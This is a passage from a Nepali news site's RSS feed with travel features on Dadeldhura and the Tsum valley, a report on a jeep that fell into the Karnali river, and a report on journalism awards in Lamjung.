छरिएर रहेका छन ।
अजयमेरुमा रहेका तीन नाउलामध्ये दुई नाउलाको भग्नावशेष मात्र छन । एक नाउला पानी खान प्रयोग भइरहेको छ । ढुंगे देवल र नाउलामा कुँदिएका कलात्मक मूर्तीले प्राचीन वास्तुकला झल्काउँछ । अजमेरुकोटको मुख्य दरबार भएको स्थान तल गाडदेखि माथि कोट भएको स्थानमा पुग्न २० मिनेट उकालो यात्रा गर्नु पर्दछ । कोट भएको डाँडामाथि दरबार र राजाका भाइभारदार बस्ने हवेली भग्नावशेषका रुपमा देखिन्छन । दरबारको संरचना सबै भत्केको अवस्थामा छ । अजयमेरु कोट पुरातत्व विभागले उत्खनन सुरु गरेपछि कत्युरीकालीन उत्कृष्ट कलाशैली बाहिर आएको छ । अजयमेरु कोट भनिए पनि कोट मात्रै नभएर दरबारका भग्नावशेषहरू, डबलीहरू, सुरक्षा गर्न बनाइएका टावरहरू, रानी गुफा, कुवाहरू राजदरबारसँग सम्बन्धित थुप्रै संरचनाहरू उत्खनन गरेको स्थानमा रहेका छन । अजयमेरु कोटमा आजभोलि ऐतिहासिक वा कलात्मक वस्तुहरू हेर्नको लागि पर्यटकहरू पुग्ने गर्दछन । प्राचीन अजयमेरु कोटलाई विश्व सम्पदा सूचीमा राख्न पर्दछ भन्ने इतिहासकारहरूले बताएका छन ।
डडेलधुरा पुगेपछि पर्यटक पुग्नै पर्ने स्थान हो उग्रतारा मन्दिर । उग्रतारा मन्दिर अमरगढी नगरपालिकामा पर्दछ । उग्रतारा भगवती मन्दिर प्यागोडा शैलीमा निर्मित छ । यो मन्दिर डडेलधुरा–बैतडी राजमार्गको पश्चिम पट्टीको रमणिय फाटमा रहेको छ । उग्रतारा भगवतीको उत्पत्ती किसानले हलो जोत्दा भएको मानिन्छ । धार्मिक विश्वास अनुसार हलोको फाली सिलामा गढेर सिलाबाट निरन्तर रगतको धारा बग्दा खोला बग्न शुरु भयो । हाल पनि यो खोला यहि मन्दिरका तलन्वाखोलाको नामले चिनिन्छ । उग्रतारालाई नीलसरस्वतीका रुपमा पनि मान्ने गरिन्छ । उग्रताराको पूजा वैदिक र तान्त्रिक दुवैविधिद्वारा गरिन्छ । उग्रतारा भगवती शीलाका रुपमा उत्पन्न भएको मानिन्छ । उग्रताराको शिला गर्भगृहमा स्थापित छ । कुनै पनि दिन यी देवीलाई अपुज अर्थात अर्चनाविहीन बनाउनु हुँदैन भन्ने मान्यता रहेको छ । उग्रतारा मन्दिरमा साँकीजातका क्षेत्रीय मुख्य पुजारी र ३ थरी भट्ट र १ पन्त थरीका छुट्टाछट्टै ४ व्राह्मणलाई सहायक पुजारी तोकिएको छ । यहाँबाट देखिने कश्यप, अपि, सैपाल हिमालको दृश्यावलोकन र डाँडाबाट देखिने प्राकृतिक सुन्दरताले पर्यटकहरूलाई लोभ्याइ दिन्छ । उग्रतारा मन्दिरमा बडा दशैंको महाअष्ठमीमा मेला लाग्ने गर्दछ ।
डडेलधुरामा सांस्कृतिक पर्वमा गौरा प्रमुख पर्व हो । गौरा पर्व सुदूरपश्चिमकै साझा पर्व भए पनि डडेलधुराको रौनक र आत्मीयता बेग्लै देखिन्छ । कतिपय पर्यटकहरू गौरा पर्वकै लागि डडेलधुरा पुग्ने गर्दछन । गौराका लागि परदेशिएकाहरू पनि घर फर्कन्छन, अनि गाउँ र बस्ती देउडाले गुञ्जिन्छ । गौरा पर्व भाद्र कृष्ण पञ्चमीमा घरमा भिजाइएको बिरुडा गहुँ, केराउ, गहत, मास र गुराँस सप्तमीमा मन्दिर लगेपछि पर्व सुरु हुन्छ । व्रतालुले शिव पार्वती स्वरुप गौरा महेश्वरको पूजा गर्दै व्रत बस्छन, मनोकामना पूरा हुने र घरमा सुख सौभाग्य आउने विश्वास गर्दछन । बिशेष गरी बजार वरपरका कारीगाउँ, सेलागाउँ, जीलोडा, हतर्क, मौराडा, जैसेरामा देउडा हेर्नकै लागि पर्यटक जम्मा हुन्छन । पूजापछि बाजागाजासहित देउडा, चैत, हुडकेउली, धमारी चल्छ । एकातिर केटा, अर्कातिर केटी तालमा ताल, पाइलामा पाइला मिलाउँदै दोहोरीमा सवाल जवाफ चल्दा पर्यटकहरूलाई रात बितेको पत्तै हुँदैन । यही मौलिक लय नै सुदूरपश्चिमको पहिचान हो, पाहुनाका लागि नौलो र रमाइलो अनुभव ।
पर्यटनका लागि डडेलधुरा प्राकृतिक, सांस्कृतिक, धार्मिक र ऐतिहासिक रुपमा समृद्ध छ । पर्यटकहरूले आफ्नो यात्राको समय बढाउन सके अमरगढी किल्ला, अजयमेरुकोट, उग्रतारा मात्र होइन डडेलधुरामा घटालबाबा, समैजी, आलिताल, परशुराम धाम, गन्यापधुरा, भागेश्वर, डागेश्वरी, नवदुर्गा, सहस्रलिंगलगायतका सम्पदाहरूमा पनि पर्यटकहरू पुग्न सक्दछन । पछिल्लो समय डडेलधुरा पर्यटनको लागि पूर्वाधारको बिकास हुँदै गएको छ । स्थानीयले डडेलधुरालाई भारतको नैनीतालसँग तुलना गर्छन । किनभने डडेलधुरा गर्मी छल्न मिल्ने हावापानी र प्राकृतिक सौन्दर्यले भरिएको छ ।
कसरी पुग्ने डडेलधुरा ?
डडेलधुरा जान कैलालीको अत्तरिया अथवा महेन्द्रनगरदेखि दैजी–जोगबुढा सडक हुँदै बुडर भएर पनि डडेलधुरा सदरमुकाम पुग्न सकिन्छ । दैजी हुँदै जोगबुढामा जादा महाकाली किनारामा रहेको परशुराम धामसँगै महाभारत पर्वतमाथि रहेको प्रसिद्ध आलीतालको आनन्दलिंदै डडेलधुरासम्म पुग्न सकिन्छ । अर्कोतर्फ मध्यपहाडी लोकमार्ग भएर सुर्खेत, अछाम र डोटी भएर पनि डडेलधुरा पुग्न सकिन्छ । तर पनि पुरानो सडक भनेको अत्तरिया–डडेलधुरा नै हो । अत्तरिया चोकवाट डडलेधुरा बजारको दुरी ११५ कि.मि.पर्दछ । डडेलधुरा जाँदा गोदावरीको समेत पर्यटकहरूले अवलोकन गर्न सक्दछन । अत्तरिया चोकदेखि बसमा चार घण्टाको यात्रामा डडेलधुराको सदरमुकाममा पुग्न सकिन्छ ।
(लेखक : लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49855 0
कर्णालीमा खसेर वेपत्ता फोर्स गाडी खोज्न प्रदेश सरकारद्वारा गृह मन्त्रालयसँग सहयोग माग https://www.antaranganews.com/?p=49810 https://www.antaranganews.com/?p=49810#respond Fri, 03 Jul 2026 12:53:09 +0000 https://www.antaranganews.com/?p=49810 सुर्खेत– कर्णाली प्रदेश सरकारले कर्णाली नदीमा हिजो खसेर वेपत्ता भएको फोर्स गाडीको खोजी कार्यका लागि गृह मन्त्रालयसँग थप सहयोग र समन्वयको आग्रह गरेको छ । कर्णाली प्रदेशको मुख्यमन्त्री तथा मन्त्रिपरिषद्को कार्यालयले गृह मन्त्रालयलाई पत्र लेख्दै असार १९ गते त्यस्तो माग गरेको हो ।
सुर्खेतबाट कालीकोटतर्फ जाँदै गरेको क.प्र.०२–००१ ख १०५५ नम्बरको फोर्स गाडी खोज्नका लागि प्रदेश सरकारले गृहमन्त्रालयसँग सहयोग माग गरेको हो । दैलेखको चामुण्डाबिन्द्रासैनी नगरपालिका– ७ स्थित कर्णाली राजमार्गको सांगेतडा सडक खण्डबाट सो गाडी कर्णाली नदीमा खसेको थियो । घट्नाको करिब ३० घण्टा वितिसक्दा पनि बसका बारेमा कुनै पत्तो हुन नसकेपछि प्रदेश सरकारले संघ सरकारको गृहमन्त्रालयसँग थप सहयोगको अपिल गरेको हो । उक्त दुर्घट्ना हिजो विहान करिब ११ः३० बजे भएको प्रहरी भनाइ छ ।
दुर्घटनापछि गोताखोर ६ जना सहित नेपाल प्रहरी, सशस्त्र प्रहरी बल तथा स्थानीय बासिन्दाको टोली तत्काल घटनास्थलमा परिचालन भई खोज तथा उद्धार कार्य सुरु गरिएको छ । प्रदेश सरकारले हालसम्म एकजना यात्रुको शव फेला परेको उल्लेख गर्दै दुर्घटनाग्रस्त सवारीसाधन र त्यसमा सवार अन्य यात्रुको अवस्था अझै अज्ञात रहेको पत्रमा उल्लेख गरेको छ ।
घटनास्थलमा खटिएको जनशक्ति पर्याप्त नभएपछि खोज तथा उद्धार कार्यलाई तीव्र बनाउन थप सहयोग तथा आवश्यक समन्वय गरिदिन प्रदेश सरकारले गृह मन्त्रालयसँग अनुरोध गरेको बताइएको छ ।
सो बसमा के कति यात्रु सवार थिए भन्ने पनि यकिन हुन सकेको छेन । सुर्खेतबाट भने दुई चालक दल(दाजु र भाइ) समेत तीन यात्रको चलान काटिएको खुल्न आएको प्रहरीले जनाएको छ । प्रहरीका अनुसार बीच बाटोमा के कति यात्रु चढेका थिए भन्ने खुल्न सकेको छैन ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49810 0
पत्रकारद्वय  गुरुङ र अधिकारी पुरस्कृत https://www.antaranganews.com/?p=49784 https://www.antaranganews.com/?p=49784#respond Thu, 02 Jul 2026 03:48:31 +0000 https://www.antaranganews.com/?p=49784 सुन्दरबजार(लमजुङ)– लमजुङका दुई क्रियाशील पत्रकारलाई पुरस्कृत गरिएको छ । नेपाल पत्रकार महासंघ लमजुङ शाखाले सुन्दरबजारमा आयोजना गरेको आफ्नो १७ औं साधारण सभाका अवसरमा असार १७ गते उहाँहरूलाई सम्मान गरेको हो ।
सम्मानित हुनेमा नेपाल पत्रकार महासंघ जिल्ला शाखाका निवर्तमान अध्यक्ष परमेश्वर अधिकारी र रेडियो मर्स्याङ्दीकी निर्देशक मिना गुरुङ हुनुहुन्छ । उहाँहरूलाई क्रमशः विकास पत्रकारिता पुरस्कार २०८१ र २०८२ बाट सम्मान गरिएको हो । तत्कालीन जिल्ला विकास समिति (जिविस) को सहकार्यमा लमजुङका क्रियाशील पत्रकारलाई वर्षेनी प्रदान गर्ने गरी उक्त विकास पत्रकारिता पुरस्कार स्थापना गरिएको हो । सो पुरस्कारको राशी १० हजार ५ रुपैयाँ नगद, सम्मानपत्र र दोसल्ला रहेको छ ।
कार्यक्रमका प्रमुख अतिथि गण्डकी प्रदेश सरकारका निवर्तमान अर्थमन्त्री डा. टकराज गुरुङ, जिल्ला समन्वय समितिका प्रमुख पूर्णबहादुृर गुरुङ, प्रमुख जिल्ला अधिकारी विष्णुप्रसाद खनाल, सभाका अध्यक्ष सन्देश पौडेल लगायतले उहाँहरूलाई सम्मान गरेका हु्न् ।
अधिकारीलाई पत्रकार महासंघको अध्यक्ष रहेर महासंघको जग्गा प्राप्ति र भवन निर्माण समितिको संयोजक रहेर काम गरेकोमा शाखाबाट छुट्टै पनि सम्मान गरिएको थियो ।
पत्रकार महासंघ लमजुङ शाखाको निर्वमान अध्यक्ष अधिकारीले १६ वर्षअघि नेपाल टेलिभिजनबाट पत्रकारिता सुरु गर्नु भएको हो । उहाँ लक्ष्मीनारायण मिडिया हाउस, लमजुङका संस्थापक सञ्चालक पनि हुनुहुन्छ । त्यस्तै, गुरुङ लमजुङको पहिलो रेडियो मस्र्याङ्दीमा स्थापनाकाल २०६४(१९ वर्ष) देखि आवद्ध रहदै आउनु भएको छ । सुरुका दिनमा सम्वाददाता रहेकी उहाँ समाचार वाचिका हुँदै हाल रेडियोको निर्देशकको जिम्मेवारीमा हुनुहुन्छ ।
पुरस्कार ग्रहणपछि अधिकारी र गुरुङले पत्रकारितामा सँगालेका अनुभव सुनाउँदै प्राप्त पुरस्कारले आफूहरूलाई थप उर्जा र प्रेरणा दिएको बताउनु भएको थियो ।
उक्त साधारणसभाको उदघाटन सत्रमा जिल्ला समन्वय समिति लमजुङका प्रमुख पुर्णबहादुर गुरुङ, नगरपालिका तथा गाउँपालिका प्रमुख तथा अध्यक्षहरू जिल्ला प्रहरी कार्यालय लमजुङका प्रहरी नायब उपरीक्षक जितेन्द्रकुमार बस्नेत, सशस्त्र प्रहरी बल नेपाल गुल्म हेडक्वार्टर लमजुङका प्रमुख सशस्त्र प्रहरी नायब उपरीक्षक विकास अधिकारी तथा राष्ट्रिय अनुसन्धान कार्यालय लमजुङका प्रमुख रामशङ्कर केसीलगायतको उपस्थिति रहेको थियो ।
पत्रकार महासङ्घका जिल्ला अध्यक्ष सन्देश पौडेलको अध्यक्षतामा सञ्चालित सभाको बन्दसत्रमा पत्रकार महासङ्घ अध्यक्ष सन्देश पौडेलले शाखाको वार्षिक प्रगति विवरण कोषाध्यक्ष निरज अधिकारीले आर्थिक प्रतिवेदन प्रस्तुत गरेका थिए । महासंघका जिल्ला उपाध्यक्ष बसन्ता भट्टले स्वागत गरेको कार्यक्रमको सञ्चालन जिल्ला सचिव कृष्णबहादुर आलेले गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49784 0
 गोरखा जिल्लाको चुम उपत्यका : पर्यटन अहिंसा क्षेत्र र बौद्ध संस्कृति   https://www.antaranganews.com/?p=49649 https://www.antaranganews.com/?p=49649#respond Thu, 25 Jun 2026 14:10:43 +0000 https://www.antaranganews.com/?p=49649 पर्यटनको उद्देश्य नयाँ ठाउँ, नयाँ अनुभव र नयाँ परिवेशको खोजी गर्नु हो । मानिस स्वभावतः आफूले नदेखेको र नभोगेको कुराप्रति आकर्षित हुन्छ । त्यसैले हिमाल नदेखेकालाई हिमाल हेर्ने रहर हुन्छ भने समुद्र नदेखेकालाई समुद्र अवलोकन गर्ने इच्छा हुन्छ । अर्कोतर्फ धेरै पर्यटकहरूलाई प्राकृतिक सौन्दर्यलाई प्रत्यक्ष अनुभव गर्ने जिज्ञासा हुन्छ । त्यसैले पर्यटकहरू पदयात्राका लागि विशेष गरी हिमाली क्षेत्र रोज्ने गर्दछन । विश्व पर्यटन बजारले नेपाललाई हिमाल र ट्रेकिङको देश भनेर चिनाएकाले वाह्य पर्यटकहरू हिमाली क्षेत्रमा पदयात्रा गर्न खोज्दछन ।
गोरखा जिल्लाको मनास्लु क्षेत्रमा नुब्री र चुम उपत्यका पर्दछ । पर्यटकहरूले पदयात्रा गर्ने दुबै उपत्यका तिब्बती बौद्ध संस्कृति, प्राचीन गुम्बा, हिमाली सभ्यता र प्राकृतिक सौन्दर्यका लागि प्रसिद्ध छन । नुब्री उपत्यका मनास्लु हिमालको उत्तरतर्फ पर्दछ । जहाँ सामागाउँ, साम्दो जस्ता गाउँहरू रहेका छन । चुम उपत्यकालाई लुकेको उपत्यका पनि भनिन्छ । गणेश हिमाल र श्रीङ्गी हिमालको बीचमा बग्ने स्यार खोलाले बनाएको छेकम्पार र चुमचेतलाई चुम उपत्यका भन्ने गरिन्छ । चुमचेतलाई तल्लो चुम र छेकम्पारलाई माथिल्लो चुम भनेर पनि चिनिन्छ । चुम उपत्यका प्राचीन ऐतिहासिक पवित्र बौद्ध धर्मको आस्था र उपासना स्थलको रुपमा रहिआएको छ । पर्यटनका लागि हिमाली जीवनशैलीका हिसाबले मनास्लु क्षेत्र अर्गानिक भूगोल हो । चुममा आजभोलि जैविक विविधता र संस्कृति संरक्षण गर्दै पर्या–पर्यटनको विकास भएको छ । एक्यापमा चुम र नुब्री दुवै उपत्यका पर्दछन । हिमाली श्रृंखला, प्राचीन गुम्बा, चैत्य र तिब्बती संस्कृति चुम र नुब्री पर्यटनका लागि दुवै उपत्यका आकर्षण मानिन्छ ।
मनास्लु सर्किट र चुम उपत्यका गरी दुई फरक–फरक पदयात्रा मार्ग यो क्षेत्रका प्रमुख आकर्षण हुन् । एडभेञ्चर र जोखिम मोल्न चाहने पर्यटकहरू मनास्लु सर्किटको यात्रा रोज्छन् भने हिमाली जीवनशैली, बौद्ध परम्परा र सुन्दर हिमाली दृश्यमा रमाउन चाहने पर्यटकहरू चुम उपत्यकाको यात्रा गर्न मन पराउँछन् । केही पदयात्रीले भने चुम उपत्यका र मनास्लु सर्किट दुवैको यात्रा एकैपटक गर्छन् । विशेष गरी मनास्लु क्षेत्रमा पदयात्रा गर्ने वाह्य पर्यटकहरू आरुघाटबाट चुम हुँदै नुब्री घुमेर लार्केपास गरी मनाङ निस्कन्छन । तर धेरै पर्यटकहरू चुम उपत्यका मात्र पुग्ने गर्दछन । कोहि पर्यटकहरू गएकै बाटो चुमबाट फर्कन्छन । वास्तवमा चुम उपत्यका पर्यटनका लागि सुन्दर उपहार हो । जहा बौद्ध दर्शन, प्रकृति, संस्कृति र जैविक विविधताले पर्यटकहरूलाई छुट्टै अनुभूति हुन्छ । चुम उपत्यकामा पाइला टेक्नेबित्तिकै धेरै पर्यटकहरू आश्चर्यचकित हुन्छन । प्राकृतिक सौन्दर्यका कारण मात्र होइन, यहाँका वन्यजन्तु र मानिसबीचको अदभुत सम्बन्धका कारण पनि पर्यटकहरूलाई अनौठो लाग्दछ । सामान्यतया जंगलका जनावरहरू मानिस देख्नेबित्तिकै भाग्छन, तर चुम उपत्यकामा दृश्य फरक छ ।
चुम उपत्यकालाई जीवजन्तुको खुला संग्रहालय भनिन्छ । यहाँका जीव जनावर र चराचुरुंगीको मानिससँग पारिवारिक सम्बन्ध जस्तै छ । चुम क्षेत्रमा झारल, घोरल, कस्तुरी मृग, कालिज, डाँफे तथा मुनाल, लंगुर बाँदर जस्ता जिवजन्तु प्रचुर मात्रामा पाइन्छ । खुला चिडियाखानको रुपमा समेत चिनिएको चुम क्षेत्रमा झारल नाउर कस्तुरी घर वरपर चरिरहेका हुन्छन । मानिससँगै जंगली जनावर पनि खेलिरहेका हुन्छन । चुम क्षेत्रका स्थानीयले दुध, दही, ध्यू, छुर्पीको लागि मात्रै पशुपालन गर्छन । आफूले पालेको पशु अन्य कसैलाई मारकाटको लागि विक्री गर्दैनन । चुम उपत्यकाका प्रमुख गाउँहरूमा तल्लो चुम, लोक्पा, चुम्लिङ, रिछेत, डोम्जे र माथिल्लो चुम, छोखाङ पारो अर्थात छेकम्पार, लार, लामागाउँ, बुर्जी, छुले, निले, राछेन गुम्बा, मु गुम्बा यी गाउँहरूमा तिब्बती बौद्ध संस्कृति, मणिपर्खाल, छोर्तेन र प्राचीन गुम्बाहरू धेरै छन । यी गाउँहरूमा पर्यटकहरू पुक्दा छक्क पर्दछन । करिब ८ सय घरधुरी रहेको चुम उपत्यकामा कुनै पनि जीव जनावर काटमार गर्न पाइदैन । शिकार खेल्न मह काड्ने र वनमा डढेलो लगाउन पाइदैन । चुम घुम्न जाने पर्यटकहरूले पनि मासु खान पाउँदैनन । किनभने होटलहरू सबै शाकाहारी मात्रै हुन्छन ।
चुम उपत्यकाको पदमार्ग वरिपरि नाउर, मृग, घोरल, हिमाली चराचुरुङ्गी तथा अन्य वन्यजन्तुहरुरू सहज रुपमा देखिन्छन । जनावरहरू पर्यटकहरूबाट त्रसित हुँदैनन, बरु आफ्नै संसारमा रमाइरहेका हुन्छन । यस्तो दृश्य देख्दा पर्यटकहरू क्यामेरा निकालेर फोटो खिच्न थाल्छन, भिडियो बनाउँछन र यो दुर्लभ अनुभवलाई स्मृतिमा कैद गर्न खोज्छन । यसको मूल कारण चुम उपत्यकाको प्राचीन अहिंसात्मक जीवनदर्शन हो । बौद्ध धर्म र करुणाको गहिरो प्रभाव रहेको चुम क्षेत्रमा जीवहत्या निषेध मानिन्छ । यहाँका स्थानीय समुदायले शताब्दीयौँदेखि सबै प्राणीलाई जीवनको समान अधिकार भएको ठान्दै आएका छन । यही कारण चुम उपत्यकालाई अहिंसा क्षेत्र भनेर चिनिन्छ । चुम उपत्यकामा जनावर र मानिसबीचको सम्बन्ध केवल सहअस्तित्वको मात्र होइन, विश्वासको पनि प्रतीक बनेको छ । यहाँको वातावरणले प्रकृति र मानवबीचको सामञ्जस्य कस्तो हुन सक्छ भन्ने जीवन्त उदाहरण प्रस्तुत गर्छ । नाउरको झुण्ड पदमार्ग नजिकै चरिरहेको देख्दा वा मृगहरू निर्धक्क हिंडिरहेको दृश्य अवलोकन गर्दा लाग्छ, मानौँ उनीहरु पनि आगन्तुकहरूको स्वागत गरिरहेका छन ।
 आजको संसारमा वन्यजन्तु र मानवबीचको द्वन्द्व बढदै गइरहेका बेला चुम उपत्यकाले करुणा, संरक्षण र सहअस्तित्वको सन्देश दिन्छ । चुम पुग्ने पर्यटकहरूले केवल हिमाल, गुम्बा र संस्कृति मात्र देख्दैनन, उनीहरूले एउटा यस्तो समाजको अनुभव गर्छन, जहाँ अहिंसाको भावना मानव सीमाभन्दा बाहिर फैलिएको छ र सम्पूर्ण जीवजगतलाई अँगालेको छ । त्यसैले चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्यको अवलोकन मात्र होइन, प्रकृतिसँगको आत्मीय सम्बन्ध र अहिंसाको जीवित दर्शनसँगको साक्षात्कार पनि हुन्छ । चुम अहिंसा क्षेत्र घोषणा भएको १ सय ६ वर्ष भएको छ । पर्यटकहरूले चुम उपत्यकामा बौद्ध धर्म फैलाउने तान्त्रिक गुरु पदमसंभवले ध्यान, योग र साधना गरेको पवित्र भूमिका बारेमा सोधखोज गर्दछन । चुम उपत्यकामा पर्यटकलाई शान्त, स्वच्छ र प्रदूषणरहित वातावरणको अनुभव छुट्टै हुन्छ । अर्कोतर्फ स्थानीय संस्कृति, परम्परा, भाषा र जीवनशैलीसँग परिचित हुने मौका पनि हुन्छ । चुमको यात्रामा साहसिक अनुभव प्राप्त गर्दै शारीरिक तथा मानसिक तन्दुरुस्ती बढाउने पनि हुन्छ । हिमश्रृखला, सूर्योदय–सूर्यास्त तथा दुर्लभ वनस्पति र वन्यजन्तु अवलोकन गर्ने अवसर पनि हुन्छ । यसैले प्राकृतिक सौन्दर्य, साहसिकता, सांस्कृतिक विविधता र आत्मिक शान्तिको खोजीले पर्यटकहरूलाई हिमाली क्षेत्रमा पदयात्रातर्फ आकर्षित गर्दछ ।
चुम उपत्यका विशिष्ट सांस्कृतिक तथा धार्मिक पर्यटन र बौद्ध संस्कृतिको जीवित संग्रहालय हो । चुम उपत्यकाका बासिन्दाले आज पनि शताब्दीयौँ पुराना भाषा, भेषभूषा, संस्कृति, धार्मिक परम्परा र अहिंसाको जीवनशैलीलाई संरक्षण गरेका छन । चुम उपत्यकामा रहेका प्राचीन गुम्बा, मणी पर्खाल, छोर्तेन, प्रार्थना झण्डा तथा ध्यानस्थलहरूले यस क्षेत्रलाई आध्यात्मिक पर्यटनको महत्वपूर्ण केन्द्र बनाएको छ । विशेष गरी मु गुम्बा र राछेन गुम्बा बौद्ध धर्मावलम्बीहरूका लागि पवित्र तीर्थस्थल मानिन्छन । स्थानीय समुदायको जीवनशैली, धार्मिक आस्था र सांस्कृतिक सम्पदा आजसम्म जीवित रहेकाले चुम उपत्यका पुगेका पर्यटकहरूले वास्तविक हिमाली बौद्ध सभ्यताको अनुभव गर्न सक्छन । गणेश हिमाल, श्रीङ्गी हिमाल र बौद्ध हिमालको मनोरम दृश्यले सजिएको चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्य, आध्यात्मिक शान्ति र सांस्कृतिक सम्पदाको अनुपम संगम हो । चुम क्षेत्रमा रहेको मु गुम्बा, राचेन आनी गुम्बा, मिलारेपा गुफा, छेसोङ ताल लगायत अन्य गुम्बाहरूले चुम उपत्यका पर्यटनका लागि अविस्मरणीय यात्राको महसुस हुन्छ । पदयात्राको क्रममा बौद्ध, संस्कृति, कला, रहनसहन, दैनिकी जिबन यापन र स्थानिय खानपिनको अनुभवको मज्जा छुट्टै हुन्छ । पर्यटकलाई गाउँघरमै उब्जाइएका जैविक आलु फापर, मकै, कोदो, भटमास, रायोको साग, चौरीको दुध, दही, छुर्पी लगायत परिकार खुवाउने गर्छन ।
चुम उपत्यकाको सामाजिक र सांस्कृतिक सम्बन्ध शताब्दीयौँदेखि तिब्बतसँग जोडिएको छ  । चुममा पुग्ने पर्यटकहरुले बहुपति प्रथा सुन्दा अचम्म मान्दछन । वहुपति प्रथामा एक महिलाले एउटै परिवारका दुई वा बढी दाजुभाइसँग विवाह गर्ने चलन हुन्छ । हिमाली क्षेत्रमा सीमित खेतीयोग्य जमिन, कठोर जीवनयापन र पारिवारिक सम्पत्ति टुक्रिन नदिन यस्तो प्रथा विकसित भएको मानिन्छ । चुम उपत्यकामा यो प्रथा अहिले नयाँ पुस्तामा प्रायः देखिँदैन । तर पनि चुम उपत्यकाको संस्कृति अध्ययन गर्ने पर्यटकहरूका लागि वहुपति प्रथा चासो र अनुसन्धानको विषय बन्दछ । चुममा महायान बौद्ध धर्मको प्रभाव भए पनि यो प्रथा धार्मिक आदेश भने होइन । बौद्ध धर्मले यसलाई न अनिवार्य गरेको छ, न निषेध । यो मुख्यतः हिमाली भूगोल, सीमित जमिन र सानो उत्पादनमा स्रोत जोगाउने सामाजिक रणनीति प्रथा मानिन्छ ।
मनास्लु पदमार्गमा स्यार खोला र बुढीगण्डकी मिसिने ठाउँलाई न्याक अर्थात न्याक पेडी पनि भनिन्छ । यही दोभानबाट स्यार खोला उपत्यका हुँदै चुम उपत्यकाको पदयात्रा सुरु हुन्छ । बुढीगण्डकी मनास्लुको उत्तरतर्फका हिमनदीबाट निस्केर गहिरा गल्छी चिर्दै दक्षिण बग्छ भने स्यार खोला गणेश हिमाल र हिमचुलीबाट उदगम भएर निले, छुले, छेकम्पार, चुम्लिङ हुँदै न्याकमा आएर बुढीगण्डकीमा मिसिन्छ । न्याकबाट चुम जाने स्वागत गेटबाट अगाडी लाग्ना साथ घना जंगल, झोलुंगे पुल पार गर्दै शेर्पा गाउँ चुम्लिङ पुगिन्छ । छेकम्पार चुमको सबैभन्दा ठूलो गाउँ हो । जहाँ पर्यटकहरुका लागि होटल, लजहरु छन । छेकम्पार देखि पर्यटकहरूलाई ढुंगाले बनेका घर, गुम्बा, माने र छोर्तेनले  वास्तविक चुमको अनुभव दिन्छ । यही बाटो हुँदै तिब्बतको ताप्ले नाका पनि पुग्न सकिन्छ । त्यसैले छेकम्पारमा सीमा प्रहरी चौकी पनि छ ।
मनास्लुको पछाडि सामागाउँ, साम्दो लगायत एक दर्जन गाउँ छन् । पूर्वतर्फ रहेको बौद्ध हिमालको पछाडि भने चुम उपत्यका पर्दछ । नेपालको नक्सा हेर्दा गोरखा जिल्लाको उत्तरी भागमा तिब्बततिर धकेलिएको भाग देख्नुहुनेछ । त्यहीँ पर्छ चुम उपत्यका । छेकम्पार, निले, चुले लगायत एक दर्जन गाउँ रहेको चुम रहस्यले भरिएको हिमाली उपत्यका हो । कल्पना गर्नुस त यी हिमाली गाउँ घुम्नुको मज्जा, यहाँका गुम्बा, स्तुप, र्छोर्तेन, माने वरिपरि घुम्न पाउदा पर्यटकहरु को अनुभव शब्दमा बर्णन गर्न सकिन्न । जीवनमा थोरै मानिसले मात्र यो आनन्द महसुस गर्न पाउँछन् । प्रकृति र बौद्ध परम्पराले अदभूत सजिएको चुममा केही वर्ष यता विदेशी पर्यटकहरू पुग्न थालेका छन । पदयात्रामा रमाउन खोज्ने पर्यटकहरुलाई मनास्लुको वास्तविक हिमाली, तिब्बती संस्कृति को अनुभव माथिल्लो क्षेत्रमा हुन्छ । तर मनास्लु पदमार्ग अब पूर्ण रुपमा पदमार्ग मात्र रहेन । सडक र पदयात्रा सहअस्तित्वमा रहेको मिश्रित मार्ग बनेको छ । तर नामरुङ माथिको भूभागले अझै पनि पुरानो मनास्लुको पदमार्ग जोगाएको छ । नामरुङ, ल्हो, श्याला, सामागाउँ र साम्दोतिर पुगेपछि भने सडकको प्रभाव निकै कम देखिन्छ ।
मनास्लु पदमार्गको पछिल्लो अवस्था सडक विस्तारले परिवर्तन ल्याएको छ । अहिले जिपहरू माछाखोला– जगत हुँदै पाङसिङ र फिलिम नजिकसम्म पुग्ने गर्दछन । काठमाडौं– आरुघाट– सोतीखोला–माछाखोला नियमित बस सञ्चालनमा छ । पहिले आरुघाट वा सोतीखोलादेखि सुरु हुने पदयात्रा अहिले धेरैले फिलिम वा त्यस वरपरबाट सुरु गर्न थालेका छन । यसले २– ३ दिनको पदयात्रा घटाएको छ । तर   तल्लो भेगको पदमार्गमा सडक निर्माणका कारण धुलो, गाडीको आवाजले पदयात्राको मौलिक अनुभव प्रभावित भएको छ । निर्माणाधिन बुढीगण्डकी करिडोरको बेनीघाट– आरुघाट– लार्केभञ्ज्याङ सडकका दूरी करिब १५४ कि.मि. रहेको छ । लार्केभञ्ज्याङ– रुइला सीमा करिब ८–१० कि.मि.रहेको छ । तर अहिले पनि माथिल्लो भेग फिलिम–साम्दो–लार्के सडक खण्ड निर्माण को चरणमा छ ।
चुम उपत्यका पुग्ने पर्यटकहरू हिमाल मात्र हेरेर फर्किँदैनन । पर्यटकहरूले पृथक सभ्यता, जीवनदर्शन र हिमाली संस्कृतिसँग साक्षात्कार गरेर फर्कन्छन । चुम उपत्यकामा पाइला टेक्नासाथ गणेश हिमाल, हिमचुली, बौद्ध हिमाल र तिब्बती हिमश्रृंखलाका मनोरम दृश्यले पर्यटकलाई मन्त्रमुग्ध बनाउँछ । हिउँले ढाकिएका शिखरहरू, नीलो आकाश र हरिया घाँसे मैदान र मानवबस्तीमा चर्न आउने जंगली जनावरले पर्यटकहरूलाई नयाँ अनुभव हुन्छ । चुममा पर्यटकहरुले जीवित तिब्बती बौद्ध संस्कृति, मानिसहरूको भाषा, भेषभूषा, घर निर्माणको शैली, धार्मिक परम्परा र दैनिक जीवनमा तिब्बती बौद्ध संस्कृतिको गहिरो प्रभाव देख्दछन । जुन कारणले पर्यटकहरुलाई चुम क्षेत्र खुल्ला सांस्कृतिक संग्रहालयजस्तै लाग्छ । तिब्बती 